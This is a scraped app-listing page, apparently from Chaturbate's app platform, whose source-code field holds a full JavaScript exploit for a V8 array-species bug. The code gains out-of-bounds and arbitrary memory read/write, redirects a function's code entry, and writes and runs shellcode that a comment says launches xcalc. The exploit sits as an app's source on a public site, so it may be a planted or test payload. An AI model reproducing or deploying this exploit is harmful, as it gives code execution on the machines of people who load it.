Apps Home
|
Create an App
aggles
Author:
blaptestbed
Description
Source Code
Launch App
Current Users
Created by:
Blaptestbed
var oob_rw = null; var leak = null; var arb_rw = null; var code = function() { return 1; } code(); class BuggyArray extends Array { constructor(len) { super(1); oob_rw = new Array(1.1, 1.1); leak = new Array(code); arb_rw = new ArrayBuffer(4); } }; class MyArray extends Array { static get [Symbol.species]() { return BuggyArray; } } var convert_buf = new ArrayBuffer(8); var float64 = new Float64Array(convert_buf); var uint8 = new Uint8Array(convert_buf); var uint32 = new Uint32Array(convert_buf); function Uint64Add(dbl, to_add_int) { float64[0] = dbl; var lower_add = uint32[0] + to_add_int; if (lower_add > 0xffffffff) { lower_add &= 0xffffffff; uint32[1] += 1; } uint32[0] = lower_add; return float64[0]; } // Memory layout looks like this: // ================================================================================ // |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30) | // -------------------------------------------------------------------------------- // |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) | // -------------------------------------------------------------------------------- // |arb_rw ArrayBuffer | // ================================================================================ var myarray = new MyArray(); myarray.length = 9; myarray[4] = 42; myarray[8] = 42; myarray.map(function(x) { return 1000000; }); var js_function_addr = oob_rw[10]; // JSFunction for code() // Set arb_rw's kByteLengthOffset to something big. uint32[0] = 0; uint32[1] = 1000000; oob_rw[14] = float64[0]; // Set arb_rw's kBackingStoreOffset to // js_function_addr + JSFunction::kCodeEntryOffset - 1 // (to get rid of Object tag) oob_rw[15] = Uint64Add(js_function_addr, 56-1); var js_function_uint32 = new Uint32Array(arb_rw); uint32[0] = js_function_uint32[0]; uint32[1] = js_function_uint32[1]; oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size // pop /usr/bin/xcalc var shellcode = new Uint32Array(arb_rw); shellcode[0] = 0x90909090; shellcode[1] = 0x90909090; shellcode[2] = 0x4831c06a; shellcode[3] = 0xff5f4883; shellcode[4] = 0xc0094889; shellcode[5] = 0xc64883c0; shellcode[6] = 0x350f05; code();
© Copyright Chaturbate 2011- 2025. All Rights Reserved.
